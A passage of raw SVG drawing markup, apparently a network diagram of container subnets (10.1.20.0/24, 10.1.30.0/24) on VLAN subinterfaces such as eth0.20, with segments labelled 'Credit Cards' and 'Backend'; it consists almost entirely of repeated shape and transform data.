54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,217,419)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,227,424)"><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="44" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="14" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="61" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="65" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="12">)</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="83" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="27">Eth0</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="29" width="73" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="5" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="20" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="23" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="31" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="34" y="42">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="49" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="52" y="42">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="60" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="63" y="42">24</text></g></g><g transform="matrix(1,0,0,1,275,387)"><g transform="translate(0,0)"><g transform="translate(-292,-88.9329528808594) translate(17,-298.0670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 279 409 L 279 391" stroke-miterlimit="10"/></g></g></g></g><g transform="matrix(1,0,0,1,215,341)"><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="129" height="40" fill-opacity="0"/></g></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="129" height="20" fill-opacity="0"/></g></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="0" width="127" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="2" y="17">Parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="55" y="17">:</text></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="65" y="0" width="63" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="65" y="17">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="102" y="17">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="107" y="17">20</text></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="20" width="129" height="20" fill-opacity="0"/></g></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="14" y="20" width="101" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="14" y="37">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="66" y="37">ID</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="84" y="37">:</text></g><g transform="translate(176,60) matrix(1,0,0,1,0,0) translate(-176,-60)"><g><rect fill="rgb(0,0,0)" stroke="none" x="95" y="20" width="21" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="95" y="37">20</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,367,409)"><g transform="translate(4,4) scale(1.0034722222222223,1.0042735042735043)"><g><g transform="translate(0,0) scale(1.44,1.17)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8547008547008548)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 107 Q 144 117 134 117 L 10 117 Q 0 117 0 107 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 107 Q 144 117 134 117 L 10 117 Q 0 117 0 107 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,1.17)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,0.8547008547008548)"><path fill="#eb6c6c" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 107 Q 144 117 134 117 L 10 117 Q 0 117 0 107 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 107 Q 144 117 134 117 L 10 117 Q 0 117 0 107 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="matrix(1,0,0,1,435,387)"><g transform="translate(0,0)"><g transform="translate(-622,-98.9329528808594) translate(187,-288.0670471191406) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#000000" d="M 439 409 L 439 391" stroke-miterlimit="10"/></g></g></g></g><g transform="matrix(1,0,0,1,373,501)"><g transform="translate(15,0) matrix(1,0,0,1,0,0) translate(-15,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(15,0) matrix(1,0,0,1,0,0) translate(-15,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(15,0) matrix(1,0,0,1,0,0) translate(-15,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="15" y="0" width="102" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="15" y="17">Credit</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="69" y="17">Cards</text></g></g><g transform="matrix(1,0,0,1,211,502)"><g transform="translate(31,0) matrix(1,0,0,1,0,0) translate(-31,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(31,0) matrix(1,0,0,1,0,0) translate(-31,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(31,0) matrix(1,0,0,1,0,0) translate(-31,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="31" y="0" width="72" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="31" y="17">Backend</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,394.910447761194,438.2696192696193)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,385.95522388059703,428.63480963480964)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,377,419)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,387,424)"><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="44" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="14" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="61" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="65" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="12">)</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="83" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="27">Eth0</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="29" width="73" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="5" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="20" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="23" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="31" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="34" y="42">30</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="49" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="52" y="42">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="60" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="63" y="42">24</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,74.91044776119404,438.2696192696193)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,65.95522388059702,428.63480963480964)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,57,419)"><g transform="translate(4,4) scale(1.0048976608187135,1.00910441426146)"><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 